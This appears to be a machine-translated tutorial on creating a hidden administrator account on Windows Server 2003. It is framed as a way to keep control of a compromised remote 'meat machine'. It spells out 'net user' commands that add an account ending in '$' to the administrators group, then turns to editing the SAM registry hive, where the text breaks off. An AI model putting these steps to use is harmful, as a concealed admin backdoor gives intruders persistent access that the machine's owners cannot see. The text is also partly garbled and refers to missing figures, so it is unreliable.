Windows server 2003 creates a hidden account forever

  

A popular phrase in the previous period, "meat machine", in fact, if you want to control the remote computer, then I think it is necessary to hide the user account, in fact, create a hidden The user account is still relatively simple, now I will tell you to create a hidden user account.

In fact, every user account has its own account data item in the registry:

First, let's see what the administrator's data items in the registry are (as shown below). Br>

Operation 1. Open the registry: HKEY_LOCAL_MACHINE\\SAM\\SAM

SAM is the place to save user accounts, but this "items" is not visible by default. If we want to see the internal content, we must first authorize it. (Recommended friends who are not very familiar with the registry should not change the registry)

Operation 2, recognize the account classification in the registry

User accounts in the OS are built-in Account number, or post-build account, can be seen in the registry. However, there are two accounts that everyone must be able to recognize, that is, the administrator account and the guest account. (As shown below)

In this figure, “000001fa4” indicates the administrator account. Even if the administrator account is renamed, this value will not change, so we can pass this value. To judge, rename the administrator account.

“000001fa5” indicates the guest account, the same value will not be changed because the guest account is renamed. The rest of its

value is basically the user account created later, the generated value.

After knowing the registry, now we will use the "net user” command to create an account, and create a hidden account must be under CMD. If you are not familiar with this command, you can refer to my other article, which is about common commands, but these commands can also be found in the help of the OS.

Operation 3, use the "net user” command to create an account

First, create a hidden user xbx$

1, net user xbx$ 123, abc /add< Br>

The meaning here is that the password for creating an xbx$ account is 123, abc (as shown below)

1, C:\\Documents and Settings\\Administrator>net localgroup administrators xbx$ /add< Br>

The meaning here is to add the xbx$ user to the management group so that we can create users with administrator privileges.

First, observe the changes in the registry, and make corresponding changes to the registry.

HKEY_LOCAL_MACHINE\\SAM\\SAM

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